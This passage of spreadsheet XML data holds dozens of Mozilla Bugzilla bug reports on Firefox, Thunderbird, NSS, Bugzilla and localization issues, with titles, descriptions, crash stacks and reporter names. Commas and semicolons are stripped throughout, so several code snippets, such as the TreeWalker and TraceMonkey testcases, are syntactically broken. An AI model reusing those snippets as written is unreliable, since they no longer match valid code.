1. Log in at https://mail.google.com/mail/
2. Click Compose Mail.
3. Make sure you are in rich formatting mode (click Rich formatting if necessary).
4. Move focus to the text editing field for the body of the message (the field below the Subject: field).
5. Type the accent mark Â´ (option-E on Dutch or U.S. keyboard on other keyboards such as Finnish there is a separate key for this usually somewhere on the right use Keyboard Viewer to figure it out).
6. Type the character a.
Actual Results:  
After step 5 a Â´ appears in the status bar but note that there's no message indicating that find-as-you-type has started.
After step 6 the status bar displays the message Â«Text found: Ã¡Â» and Camino selects the Ã¡ you have just typed.
Expected Results:  
Find-as-you-type should not have started.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-105459</t>
  </si>
  <si>
    <t>[TXT-&gt;HTML] *bold* etc. and smileys (emoticons) no longer working in mail/news</t>
  </si>
  <si>
    <t>win32 2001101803 on win2kpro-sp2
This may be related to the fix for 104693.
Send a text/plain mail to yourself with:
*test*
_test_
=)
-)
:-)
None autoHTMLify.</t>
  </si>
  <si>
    <t>lohphat</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-423423</t>
  </si>
  <si>
    <t>tr / Turkish</t>
  </si>
  <si>
    <t>Turkish recommendations for Getting Started page</t>
  </si>
  <si>
    <t>Here's the list of recommended sites and services for Turkish version of Getting Started page.
Work:
docs.google.com
office.microsoft.com/tr-tr
rememberthemilk.com
Clipmarks add-on
Learn:
ntvmsnbc.com.tr
sozluk.sourtimes.org
tr.wikipedia.org
seslisozluk.com
Answers add-on
Play:
lastfm.com.tr
flickr.com
youtube.com
use Add-ons Manager to customize Firefox
Connect:
sosyomat.com
yonja.com
meebo.com
subscribe to RSS feeds</t>
  </si>
  <si>
    <t>erkan</t>
  </si>
  <si>
    <t>aserkant</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-499281</t>
  </si>
  <si>
    <t>[l10n] In 3.5 geolocation pages Geolocation in Firefox is untranslated in title bar for de bn-IN pt-PT</t>
  </si>
  <si>
    <t>In 3.5 geolocation pages Geolocation in Firefox is untranslated and appears in English in the title bar for three locales.
These locales are:
bn-IN de pt-PT
Eaxmple: https://pt-pt.www-trunk.stage.mozilla.com/pt-PT/firefox/geolocation/</t>
  </si>
  <si>
    <t>CORE-103148</t>
  </si>
  <si>
    <t>Active Accessibility: turn off XUL accessibliity when not needed</t>
  </si>
  <si>
    <t>see bug 69995 for the discussion about the #ifdef MOZ_XUL
Use MOZ_XUL to turn off the compilation of XUL accessiblity files.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-465879</t>
  </si>
  <si>
    <t>dead MBP</t>
  </si>
  <si>
    <t>My MacBook Pro seems to have died. It looks like a hard drive crash but I don't have any way to verify. This is somewhat bad timing with the b2 freeze pending and this is a serious interruption of my work.
Would it be possible to try out a new hard drive tomorrow morning and if that doesn't help swap the mbp for a new one tomorrow afternoon? I would prefer not having to wait for it to be repaired or switch to another one and then switch again when its fixed.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-280945</t>
  </si>
  <si>
    <t>XForms XPI missing nsSchemaValidatorRegexp.js/.idl</t>
  </si>
  <si>
    <t>For regexp support I have a JS XPCOM component:
http://lxr.mozilla.org/seamonkey/source/extensions/schema-validation/src/nsSchemaValidatorRegexp.js
http://lxr.mozilla.org/seamonkey/source/extensions/schema-validation/public/nsISchemaValidatorRegexp.idl
Which we don't package and I only remembered about today.</t>
  </si>
  <si>
    <t>CORE-460926</t>
  </si>
  <si>
    <t>A11y hierarchy is broken on Ubuntu 8.10 (GNOME 2.24)</t>
  </si>
  <si>
    <t>It was reported at
http://bugzilla.gnome.org/show_bug.cgi?id=535827#c35
The problem is gtk+ loads gail and atk-bridge modules no matter what is set in GTK_MODULES.
So our workaround in bug 312092 is broken.
To completely resolve this issue we need to make at-spi work with 2 a11y toolkits situation no matter which module is loaded and initialized firstly.
But currently it's not working and shutdown atk-bridge and re-init it will cause a crash in libORBit.
So currently we have to use another workaround.</t>
  </si>
  <si>
    <t>BUGZILLA-478230</t>
  </si>
  <si>
    <t>You cannot log in immediately after logout</t>
  </si>
  <si>
    <t>Log in then log out. From the logout page (relogin.cgi) enter your credentials in the header or footer login form. You credentials are happily ignored because relogin.cgi is reloaded and so your credentials are invalidated immediately. It took me some time to understand why I couldn't relogin. Probably should you be redirected to index.cgi on logout see bug 121601. In that case this bug will be fixed by bug 121601.</t>
  </si>
  <si>
    <t>THUNDERBIRD-516863</t>
  </si>
  <si>
    <t>Need to package nssdbm3.chk on 1.9.1 too now</t>
  </si>
  <si>
    <t>Created attachment 400935
Fix
Bug 504080 brought 1.9.1 to NSS 3.12.4 so we need to take the ifdefs off packaging nssdbm3.chk and stop removing it for m-c -&gt; 1.9.1 downgrades.</t>
  </si>
  <si>
    <t>CORE-302805</t>
  </si>
  <si>
    <t>{inc}table expands on onmouseover and onmouseout</t>
  </si>
  <si>
    <t>i'm not sure if i have the right component here but here goes.  this occurs
with both firefox 1.0.6 and deer park a2 on winxp.
1) go to http://www.bluetights.net
2) mouse over one of the links but not one of the links in the left column.
expected behaviour:
the white main table remains the same height.
actual behaviour:
on mouseover and mouseout the table grows in height - lines appear to be added
on the bottom of the table.  normally reloading the page not only returns the
table to the correct height it also stops the behaviour from occurring again. 
hard reloading (ctrl-shift-r) resets the table to the correct height but causes
the mysterious table growing problem to reoccur.
i have no clue what's causing this - i'll try to pour over the source some more
but i'm lost.</t>
  </si>
  <si>
    <t>ratman</t>
  </si>
  <si>
    <t>NSS-128946</t>
  </si>
  <si>
    <t>erroneous sample code in mozilla web page</t>
  </si>
  <si>
    <t>At the URL cited above there is some sample code that includes this snippet:
    if (hasroot) {
        dll_path = yourFindrootCertModuleInYourInstallTree()
        SECMOD_AddNewModule(Root Certsdll_path 0 0)
    }
The test  if (hasroot) should be if (!hashroot)</t>
  </si>
  <si>
    <t>WEBSITES-476776</t>
  </si>
  <si>
    <t>Add Sean Martell's blog to Planet Mozilla</t>
  </si>
  <si>
    <t>Sean Martell Visual Designer Mozilla Labs
Sean has been a long time visual design contributor working on the UI for Firefox 2 and most recently Fennec as well as being responsible for designing Developer Kit and a number of the Labs logos.  Sean is responsible for meeting the visual design requirements of the various Labs experiments (e.g.  providing icons logos user interfaces etc.) the design of the Labs web sites and supporting the wider community in the development of new mockups and prototypes through the concept series.</t>
  </si>
  <si>
    <t>BUGZILLA-455845</t>
  </si>
  <si>
    <t>Emails have no header to indicate that they are auto-generated and so get auto-responses</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (compatible Konqueror/3.5 en_US) KHTML/3.5.10 (like Gecko)
Build Identifier: 
BugZilla sends out autogenerated mails e.g. when somebody subscribes to a bug.
Problem: These mails have headers to make them look like a real mail (From: and To: headers) but have no (standardized!) headers to indicate that they were autogenerated!
This leads to the problem that these mails are AUTOREPLIED TO by e.g. *BSD vacation.
An recent example from the bugzilla used at kde.org:
Return-Path: 
...
From: Sender 
Sender: bugzilla_noreply@kde.org
To: ralf.hildebrandt@charite.de
Subject: [Bug 112213] XMPP Jabber TLS support
X-Bugzilla-URL: http://bugs.kde.org/
X-Bugzilla-Reason: Voter
X-Bugzilla-Type: newchanged
X-Bugzilla-Watch-Reason: None
X-Bugzilla-Product: kopete
X-Bugzilla-Component: Jabber Plugin
X-Bugzilla-Keywords:
X-Bugzilla-Severity: wishlist
X-Bugzilla-Who: sender@domain
X-Bugzilla-Status: NEW
X-Bugzilla-Priority: NOR
X-Bugzilla-Assigned-To: kopete-bugs@kde.org
X-Bugzilla-Target-Milestone: ---
X-Bugzilla-Changed-Fields: CC
In-Reply-To: 
References: 
Content-Type: text/plain charset=UTF-8
MIME-Version: 1.0
Message-Id: 
Date: Thu 18 Sep 2008 00:21:29 +0200 (CEST)
As you can see there is no
Precedence: bulk
header which would cause any sensible vacation program NOT to answer!
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>ralf.hildebrandt</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-691233</t>
  </si>
  <si>
    <t>firefox.com/channel: detect mobile or desktop device and promote the right build for download</t>
  </si>
  <si>
    <t>Created attachment 564115
tablet screenshot
Going to firefox.com/channel on a mobile device (even a tablet) exposes you to four large green download buttons. The ones that you want are not the ones within the closest reach (see attached screenshot). In fact it's hard to see why you would ever want to download a desktop build on an Android device.
Can we just not offer desktop builds to mobile visitors? At least not via big green buttons please! And conversely I would argue that mobile builds aren't usually interesting for desktop users so we should maybe demote the big green button for those to just a link for desktop users.</t>
  </si>
  <si>
    <t>CORE-492915</t>
  </si>
  <si>
    <t>TM: Using ++ on property of an Object whose name is in a var falls off trace</t>
  </si>
  <si>
    <t>Created attachment 377337
testcase
See attached testcase.  It falls off trace on the x.a++ line.</t>
  </si>
  <si>
    <t>SEAMONKEY-475511</t>
  </si>
  <si>
    <t>MailNews: Backend</t>
  </si>
  <si>
    <t>Rename Unsent Messages to Outbox in the backend</t>
  </si>
  <si>
    <t>Unsent Messages is a bad special folder name because it contains a space. It only worked by accident (see bug 466261). We should rename it to Outbox.</t>
  </si>
  <si>
    <t>CORE-214081</t>
  </si>
  <si>
    <t>[FIX]Content sink can get confused about pending script loads</t>
  </si>
  <si>
    <t>The basic problem is that the content sink has some logic to guess whether a
script will require the parser to be blocked.  Instead of guessing it should
use something reliable like a return value or something....
In fact the sane way to do this may be to move the parser blocking and
unblocking into the script element itself (sort of the way the stylesheet
linking stuff works).
I'll be attaching a minimal testcase reduced from that website</t>
  </si>
  <si>
    <t>FIREFOX-348007</t>
  </si>
  <si>
    <t>Firefox will crash if use index = -1 to get top level accessible window</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-461029</t>
  </si>
  <si>
    <t>Log POP errors to the PR_LOG module</t>
  </si>
  <si>
    <t>Created attachment 344168
The fix
At the moment we have an Error() function in nsPop3Protocol that will display errors to the user.
However this function has no console-based form of logging this means we don't see what errors the user has been presented with (if using NSPR_LOG_MODULES) and we have no chance of seeing what is going on in xpcshell tests.
The attached patch adds a PR_LOG line so that we'll log the error. It still means for xpcshell tests that NSPR_LOG_MODULES needs enabling for pop but its certainly better than the situation now.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-442887</t>
  </si>
  <si>
    <t>qm-xserve01 needs repair</t>
  </si>
  <si>
    <t>Please fix qm-xserve01 (dep unit test) on the Firefox tree. I broke it last night debugging some Firefox 3.0.1 nissues and I couldn't get it working again.
Sorry for the inconvenience.
Thanks
~reed</t>
  </si>
  <si>
    <t>CORE-452713</t>
  </si>
  <si>
    <t>TM: Assertion failed: Should not move data from GPR to XMM</t>
  </si>
  <si>
    <t>./js -j
js&gt; for (var j = 0 j &lt; 5 ++j) { if (''[-1]) { } }
Assertion failed: Should not move data from GPR to XMM: false (nanojit/Nativei386.cpp:1139)</t>
  </si>
  <si>
    <t>CORE-467383</t>
  </si>
  <si>
    <t>Reduce QIs and AddRef/Releases caused by nsContentUtils::HasMutationListeners</t>
  </si>
  <si>
    <t>Created attachment 350790
testcase for setAttribute
I used this artificial testcase to profile changing attribute value.
nsGlobalWindow::QI and AddRef/Release shows up in the profile taking 2-3%.
Patch coming once I've run all the tests.</t>
  </si>
  <si>
    <t>CORE-481139</t>
  </si>
  <si>
    <t>Crash [@ nsWSRunObject::GetNextWSNode] with contenteditable changing root</t>
  </si>
  <si>
    <t>Created attachment 365142
testcase (crashes Firefox when loaded)
I've been hitting this a lot lately.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-443022</t>
  </si>
  <si>
    <t>Add Firefox 2.0.0.15 to stats</t>
  </si>
  <si>
    <t>Please add Firefox 2.0.0.15 to our stats. FirefoxActiveUserCountByVersion Firefox20DownloadsByVersion etc.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-572505</t>
  </si>
  <si>
    <t>please pull an image from t-r3-w764-ref</t>
  </si>
  <si>
    <t>I've finished configuring the 64-bit Windows 7 test ref platform. Please pull an image for it to be used to image the machines in bug 564258.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-268757</t>
  </si>
  <si>
    <t>Update Extension: LiveLines 0.3.2</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Win98 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
- File: http://www.heygom.com/extensions/livelines/downloads/livelines_0.3.2.xpi
- Works with FF 1.0PR - 1.0
- Description: Add RSS feeds to Bloglines or Sage with the RSS icon on the
status bar.
- Category: Blogging
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>heygom</t>
  </si>
  <si>
    <t>CORE-424715</t>
  </si>
  <si>
    <t>Takes excessively long to render raytracing benchmark</t>
  </si>
  <si>
    <t>Run Full Render benchmark on this site:
http://nontroppo.org/timer/progressive_raytracer.html
Be prepared for Firefox to more or less freeze for up to 10 mins on a good CPU.
Take latest snapshot of Opera runs about 10x faster (12x faster when I'm not using a clean profile for Firefox). Something is clearly going very very wrong with Firefox rendering. I don't think it matters if other browsers are running a little faster but this is clearly indicative of something that needs fixing.</t>
  </si>
  <si>
    <t>zurtex</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-470309</t>
  </si>
  <si>
    <t>Teach buildbotcustom.step.misc.GetHgRevision() about locally modified checkouts</t>
  </si>
  <si>
    <t>Created attachment 353722
GetHgRevision and local modifications
When asked to identify a repository GetHgRevision() will pass along an additional '+' character to indicate local modifications were present.
This can confuse various things like buildbot trying to generate links to that particular revision on hg.mozilla.org (see bug 464893).
This small patch always sets hg_revision to a clean revision and possibly sets
the hg_modified proprety to true if there were local modifications.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-346432</t>
  </si>
  <si>
    <t>Recently Added link on main page (https://addons.mozilla.org/) informs about recently updated (information wise)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5
The Recently Added link on main page leads to a page where the results of a search of recently updated entries is shown.
There is already a list of Recently Updated extensions where the most recent versions approved appear.
May be the link description should be changed to make this distinction:
- last added extensions (for new extensions)
- last updated extensions (for new versions of existing extensions)
- last updated information on extensions (for changes on descriptions etc...)
or rename the Recently Added link as Recent changes (which is not the same as updates or additions).
Reproducible: Always
Steps to Reproduce:
1. Check the Recently Added link on main page.
2. Modify the description of an extension.
3. Check again the Recently Added link on main page.
Actual Results:  
The last added extension is the one with the modified description.
Expected Results:  
The Recently Added page should be the same for steps 1 and 3 (unless a most recent extension had been added).</t>
  </si>
  <si>
    <t>tnarik</t>
  </si>
  <si>
    <t>JSS-75490</t>
  </si>
  <si>
    <t>memory bug in decodeAndImportKey causes SEGV</t>
  </si>
  <si>
    <t>This causes a SEGV when importing keys from a PKCS #12 file.
Memory is being allocated from an arena but freed with PR_Free.
Solution: allocate the memory with PR_Malloc (or PR_NEWZAP which calls
PR_Malloc).</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-218211</t>
  </si>
  <si>
    <t>doctor.cgi provides non-working bugzilla link for creating a bug to get new cvs account</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
when Doctor gives you the Doctor - review changes to 
http://www.mozilla.org/blah/blah.html page it provides the following link:
http://bugzilla.mozilla.org/enter_bug.cgi?product=mozilla.org&amp;component=CVS+Account+Request&amp;version=other&amp;rep_platform=All&amp;op_sys=All&amp;short_desc=webtree+CVS+account+for+%3Cyour+name+here%3E+-+%3Cyour+email+address+here%3E&amp;comment=%3CEnter+a+description+of+what+you+would+like+to+edit+on+the+web+site+here.++Note%0D%0Athat+you+need+someone+who+already+has+access+to+vouch+for+you.%3E
this link doesn't behave as expected.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>bmo</t>
  </si>
  <si>
    <t>THUNDERBIRD-422384</t>
  </si>
  <si>
    <t>Double-clicking on any message opens an empty message window and mail not marked as read</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X 10_5_2 de-de) AppleWebKit/525.13 (KHTML like Gecko) Version/3.1 Safari/525.13
Build Identifier: Mozilla/5.0 Version 3.0a1pre en-US and de 2008031103
If I double click on a message to read it the opend window is empty. I have this since nightly 2008031103. 
Reproducible: Always
Steps to Reproduce:
1. Double click on any mail in the left column to open it
2. Wait until the message window appears
3.
Actual Results:  
The appearing message window is empty. I can't read the mail.
I use no themes or extensions. If I go back to a former version of Thunderbirs I don't have this problem.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-369656</t>
  </si>
  <si>
    <t>patcher2 uses an odd method for checking out CVSHEAD which is currently broken</t>
  </si>
  <si>
    <t>Created attachment 254345
Patch
patcher2 currently does this to check everything out:
  182   $ENV{'MOZ_CO_PROJECT'} = 'all'
  183   my $makeArgs = ['-f' 'mozilla/client.mk' 'checkout']
  184   $rv = RunShellCommand(command =&gt; 'make'
  185                         args =&gt; $makeArgs
  186                         output =&gt; 1)
This looks fine... but doesn't work. Changes to the way client.mk pulls CVS modules have broken this on trunk so that lots of directories are missed (important ones - like tools/update-packaging other-licenses/bsdiff and modules/libbz2). No one has really noticed this because everyone uses .mozconfig files to do the checkout. Replacing the above checkout command with an appropriate .mozconfig correctly pulls all directories and allows the --build-tools step to succeed.</t>
  </si>
  <si>
    <t>CORE-500897</t>
  </si>
  <si>
    <t>Window resizer is not drawn correctly on some themes</t>
  </si>
  <si>
    <t>Created attachment 385551
Patch
I found another minor hiccup that the New Wave theme exposes (I love this theme it's shown so many bugs in our code in addition to being so sexy that my mates are asking if it's available for Vista). The window resizer has the wrong style rules given to it so on some themes this causes a difference between us and native apps.</t>
  </si>
  <si>
    <t>NSS-323817</t>
  </si>
  <si>
    <t>Truncation of hashes for ECDSA should be done at bit level not octet level</t>
  </si>
  <si>
    <t>When performing ECDSA with a hash algorithm other than
SHA-1 if the hash output is longer than the length of
the base point order n the hash output needs to be
truncated to that length.  This length is a length in
bits not octets.
In lib/freebl/ec.c we truncate the hash output by
setting the hash output's length in octets to the base
point order's length in octets.  This is fine if the
base point order's length in bits is a multiple of 8
but in general this is incorrect.
There is another complication.  Since we store the hash
output in a SECItem as an octet string rather than a bit
string if we need to truncate the hash output and the
length in bits is not a multiple of 8 we also need to
right-shift the bits in the remaining octets.</t>
  </si>
  <si>
    <t>CORE-315383</t>
  </si>
  <si>
    <t>Elements with coordinates &gt;= 32768 not drawn</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051025 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051025 Firefox/1.5
Lines that substantially exceed the SVG view box are not shown.
It would appear coordinates are being truncated to a 16bit number somewhere as line of length less than 32767 (after any scaling) are ok but lines of 32768 or longer (after any scaling) are not shown. 
Reproducible: Always
Steps to Reproduce:
I'll attach an example file.
Actual Results:  
The attached file should display 6 horizontal lines a pair of red a pair of green and a pair of blue.
Expected Results:  
Only the *slightly* shorter blue lines are displayed.
The red and green lines hould be displayed.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-232892</t>
  </si>
  <si>
    <t>imap folders which get new mail filtered nto them by client-side filters not getting counts updated or green arrow</t>
  </si>
  <si>
    <t>Imap folders which get new mail filtered into them by client-side filters are
not getting counts updated or green arrow on the folder until the folder is
selected in the UI. This is a regression from some code that attempted to fix
counts when the server reports a different unread count than what we think we
have in the folder.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-373052</t>
  </si>
  <si>
    <t>lists.mozilla.org moderator pages return  403 Forbidden</t>
  </si>
  <si>
    <t>Go to https://lists.mozilla.org/admindb/dev-tech-crypto 
expect: moderator login page
Actual: 403 Forbidden
started sometime since the morning of March 3</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-407316</t>
  </si>
  <si>
    <t>Dynamic Font Tracking Bug</t>
  </si>
  <si>
    <t>to help organize a list of sites test cases other bugs work around solutions and coordination of evangelism efforts on Dynamic Font issues.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-192942</t>
  </si>
  <si>
    <t>detailingdirect.com - bad html unclosed a tag</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030209 Phoenix/0.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030209 Phoenix/0.5
To navigate the website you must use the Site Map links located in the left
column.  Selecting any of the links however always brings up the same page.
Reproducible: Always
Steps to Reproduce:
1. Visit http://www.detailingdirect.com
2. Select any of the links in the Site Map in the left column
3.
Actual Results:  
Selecting any of the Site Map links always brings up the same page
Expected Results:  
The appropriate page should be brought up for the link selected</t>
  </si>
  <si>
    <t>MOZILLA.ORG-475267</t>
  </si>
  <si>
    <t>L10n Mercurial (hg) account request - Emilio SepÃºlveda - es-CL</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 es-CL rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5 Ubiquity/0.1.5
Build Identifier: 
I request a Hg account for commit a es-CL langpack for Firefox (Bug 395549).
Reproducible: Always</t>
  </si>
  <si>
    <t>emisepulvedam</t>
  </si>
  <si>
    <t>CORE-384122</t>
  </si>
  <si>
    <t>QueryInterface shouldn't be enumerable on DOM interface objects</t>
  </si>
  <si>
    <t>BUGZILLA-399088</t>
  </si>
  <si>
    <t>Remove the 'quicksearch_comment_cutoff' parameter</t>
  </si>
  <si>
    <t>Per our discussions at our last 2 Bugzilla meetings this param should go away. It should be replaced by a constant = 4.</t>
  </si>
  <si>
    <t>BUGZILLA-385379</t>
  </si>
  <si>
    <t>Move dependency DB updating from process_bug into Bugzilla::Bug</t>
  </si>
  <si>
    <t>After keywords and CCs the next thing that I can move into the DB is dependencies.</t>
  </si>
  <si>
    <t>CORE-179151</t>
  </si>
  <si>
    <t>Need to call FreeLibrary()</t>
  </si>
  <si>
    <t>I see HMODULE module = ::LoadLibrary(Shell32.dll)
but no call for FreeLibrary(module) is mode.
Memory leak!</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-243618</t>
  </si>
  <si>
    <t>Windows registry (non-ascii values) for MAPI are garbled</t>
  </si>
  <si>
    <t>Spin-off of bug 232969.
In bug 232969 I fixed a problem with storing non-ASCII string values in Win
registries. A similr problem exists at
http://lxr.mozilla.org/mozilla/source/mailnews/mapi/mapihook/src/nsMapiRegistryUtils.cpp#148</t>
  </si>
  <si>
    <t>CORE-375772</t>
  </si>
  <si>
    <t>Crash loading a certain page as UTF8</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:
1)  Load the attached page (coming up).
2)  Make sure that it's being rendered as UTF8 (View menu etc).
3)  Scroll to the bottom.
ACTUAL RESULTS: Crash
EXPECTED RESULTS:  Not crash
ADDITIONAL INFORMATION:
The page originally comes from http://mxr.mozilla.org/l10n-mozilla1.8/search?string=findField.tooltip
The talkback incident for me first hitting this is TB30683643
The crash is caused by:
** ERROR **: file shape.c: line 75 (pango_shape): assertion failed: (glyphs-&gt;num_glyphs &gt; 0)
aborting...
glyphs-&gt;num_glyphs is 0.
The top of the stack is:
#5  0x001947cd in pango_shape (text=0x0 length=0 analysis=0x6 glyphs=0x90e2ad0)
    at shape.c:75
#6  0xb5af1a12 in FontSelector::AppendNextSegment (this=0xbfffbca0 aFont=0x8fceff8 
    aUTF8Length=1 aGlyphs=0x90e2ad0 aGotGlyphs=0)
    at ../../../../mozilla/gfx/thebes/src/gfxPangoFonts.cpp:1273
#7  0xb5af1824 in FontSelector::InitSegments (this=0xbfffbca0 aOffset=0 aLength=91 
    aFontIndex=0) at ../../../../mozilla/gfx/thebes/src/gfxPangoFonts.cpp:1377
#8  0xb5af0b83 in FontSelector::Run (this=0xbfffbca0)
    at ../../../../mozilla/gfx/thebes/src/gfxPangoFonts.cpp:1226
In frame 7:
(gdb) list
1372                            }
1373                        }
1374
1375                        if (i != 0) {
1376                            // found glyphs
1377                            AppendNextSegment(font offset - (aOffset + skipLength)
1378                                              glyphString PR_FALSE)
1379                        }
1380
1381                        // missing glyphs
(gdb) p i
$19 = 28
(gdb) p glyphString-&gt;num_glyphs
$20 = 0
(gdb) p num_glyphs
$21 = 49
I'm not sure how to reconcile those last two numbers to be honest...</t>
  </si>
  <si>
    <t>CORE-331052</t>
  </si>
  <si>
    <t>RTL  inside table is misaligned with incremental reflow</t>
  </si>
  <si>
    <t>On certain RTL pages (especially long ones) I notice that the text in select boxes is misaligned and partially cut off. Selecting an option from the drop-down or resizing the font on the page fixes the problem.
This is not 100% reproducabe but can almost always be reproduced on the page in the URL field after several reloads.
I could not create a local testcase which would reproduce the problem.
This apparently regressed in 3 stages:
* Until 2006-01-12 everything was fine
* Starting from 2006-01-13 the text became aligned to the left instead of to the right but was still fully visible. A checkin which might be relevat is bug 51767
* Starting from 2006-02-22 (when bug 299065 landed) the text became shifted to the right and partially cut-off.
* Starting from 2006-03-16 (landing of bug 192767 bug 96394 and bug 318116) this also seems to affect the nearby button which is pushed to the next line.
I'll attach screenshots immediately.</t>
  </si>
  <si>
    <t>CORE-55722</t>
  </si>
  <si>
    <t>highlight+backspace no longer deletes highlighted text in url box</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux 2.2.15-4mdk i586 en-US m18) Gecko/20001007
BuildID:    2000100706
highlighting text in the url box then hitting backspace should delete all selected text.						
Reproducible: Always
Steps to Reproduce:
1.load any page
2.highlight all text after the www.
3.hit the backspace key
Actual Results:  text stays highlighted 						
Expected Results:  text should be removed allowing entry of new address</t>
  </si>
  <si>
    <t>randj</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-454178</t>
  </si>
  <si>
    <t>[cy] Firefox 3 Web parts for Welsh</t>
  </si>
  <si>
    <t>New locales need to have in-product pages used by Firefox listed here: 
http://l10n.mozilla.org/webdashboard/?project=0&amp;task=Firefox+3+in-product+pages
Since web pages are a moving target with content and markup changing over time Pascal will follow up here with the status quo on that.</t>
  </si>
  <si>
    <t>CORE-185092</t>
  </si>
  <si>
    <t>Treewalker crashes on evil code</t>
  </si>
  <si>
    <t>The following evil (ie totally invalid) code crashes mozilla.  Not sure if this
is fixable caillin and peterv said I should file a bug :)
    function doGetInnerText(){
      var walker
      var resultString = 
      function acceptNode(node) {
        resultString += node.nodeValue
        walker.nextNode() // ********EVIL CODE LINE*************
        return NodeFilter.FILTER_ACCEPT
      }
      walker = document.createTreeWalker(document.getElementById('myHTML')
                                             NodeFilter.SHOW_TEXT
                                             acceptNode
                                             true)      
      var node = walker.firstChild()
      while (node) { node =walker.nextNode() }
      alert(resultString)
    }    
Stack:
nsScriptSecurityManager::CheckPropertyAccessImpl
[c:/builds/seamonkey/mozilla/caps/src/nsScriptSecurityManager.cpp line 605]
nsScriptSecurityManager::CanAccess
[c:/builds/seamonkey/mozilla/caps/src/nsScriptSecurityManager.cpp line 2431]
XPCWrappedNative::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp line 1685]
XPC_WN_GetterSetter
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp
line 1316]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 841]
js_InternalInvoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 932]
js_GetProperty [c:/builds/seamonkey/mozilla/js/src/jsobj.c line 2549]
js_Interpret [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 2640]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 857]
nsXPCWrappedJSClass::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp line 1202]
nsXPCWrappedJS::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp line 430]
PrepareAndDispatch
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp
line 117]
SharedStub
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp
line 139]
nsTreeWalker::TestNode
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 598]
nsTreeWalker::ChildOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 535]
nsTreeWalker::FirstChildOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 319]
nsTreeWalker::NextInDocumentOrderOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 405]
nsTreeWalker::NextNode
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 269]
XPTC_InvokeByIndex
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp
line 106]
XPCWrappedNative::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp line 2018]
XPC_WN_CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp
line 1284]
